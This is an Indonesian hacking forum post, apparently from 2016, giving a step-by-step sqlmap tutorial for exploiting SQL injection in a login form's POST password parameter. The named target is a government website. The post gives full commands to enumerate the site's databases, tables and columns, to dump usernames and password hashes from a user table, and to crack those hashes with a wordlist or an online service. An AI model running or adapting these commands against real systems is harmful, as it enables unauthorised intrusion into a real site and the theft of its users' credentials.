Exploitation ( Sqlmap $POST )

by kcnewbie - 03-12-2016 at 01:23 AM
Security Analyze
Super Moderators
Posts:
35
Joined:
Mar 2016
Likes:
1
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-12-2016, 01:23 AM (This post was last modified: 03-13-2016, 12:55 PM by kcnewbie.)
[Image: gYe4o3u.png]
Assalamualaikum

Haloo.. ketemu lagi nih.. ckck... ane akan menunjukan ilmu ane yang sedikit ini.. hehe..
yaitu ..

SQLMAP .. apa itu SQLMAP ?
Sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection.

kali ini ane akan ngebahas tentang.. cara exploitasi website ber bug Sql Injection $POST ..  :D
ok langsung kita mulai aja..

target : http://datanusantara.lemhannas.go.id/home/login
$POST : login_param=1&username=dsdsads&password=dasdsa&security_code=0499
bug : password



1. Scanning Database
ketikan perintah:

Code:
sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" --dbs

[Image: dxxUFIA.png]

nah keluarkan list database nya ..

rincian:

perintah sqlmap : perintah untuk memanggil/menjalankan sqlmap
perintah -u : untuk menentukan target/site
perintah --data= : untuk menentukan $POST pada target
perintah -p : untuk menentukan parameter post manakah yang vuln
perintah --dbs : untuk mencollect Database / scanning database

2. Scanning Tables on Database

Ketika kita sudah mendapatkan list DBnya.. lalu kita scanning tables yang ada didalamnya..
ketikan perintah:
Code:
sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb --tables

[Image: kbK8a0V.png]

rincian :

--tables : untuk menscanning table yang ada di dalam database yang kita pilih..
formatnya:
namadatabase -D namatablenya --tables

-D sendiri adalah sama untuk mendeteksi database yang kita pilih untuk mendapatkan tablenya..

3. Scanning Columns on Tables

setelah kita mendapatkan database dan tables nya.. sekarang kita coba collect lebih dalam lagi.. yaitu kita scann columnya..
ketikan perintah:

Code:
sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb -T tbl_pengguna --columns

[Image: 83Ypt8V.png]

rincian:

--columns adalah perintah untuk mencollect column yg berada di dalam tables..
untuk menentukan tables yang ingin kita dump columnya ketikan perintah..

-D nama database -T namatablesnya --column

4. DUMP data


akhirnya kita telah mencapai ke penghujung acara hehe...
saatnya kita sedot datanya , siapa tau ada data penting ye gak ? :v

ok ketikan perintah:

Code:
sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb -T tbl_pengguna -C username,password --dump

[Image: KaSRixl.png]

Jika ada pertanyaan seperti di atas.. itu ada lah pertanyaan " apakah kamu mau crack password di atas via dictionary based ?"
intinya ente mau di crack otomatis gak ? pake wordlist yg di sediakan sqlmap ? jika iya ketik Y / enter saja
jika tidak ketik N..

[Image: 5Xy2dV1.png]

Taraa.. data pun ter dump..

kalian bisa juga mengcrack nya di HashKiller.co.uk

Selamat berpentest ^_^
Zero-Security.id | BackBox Jakarta Team
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)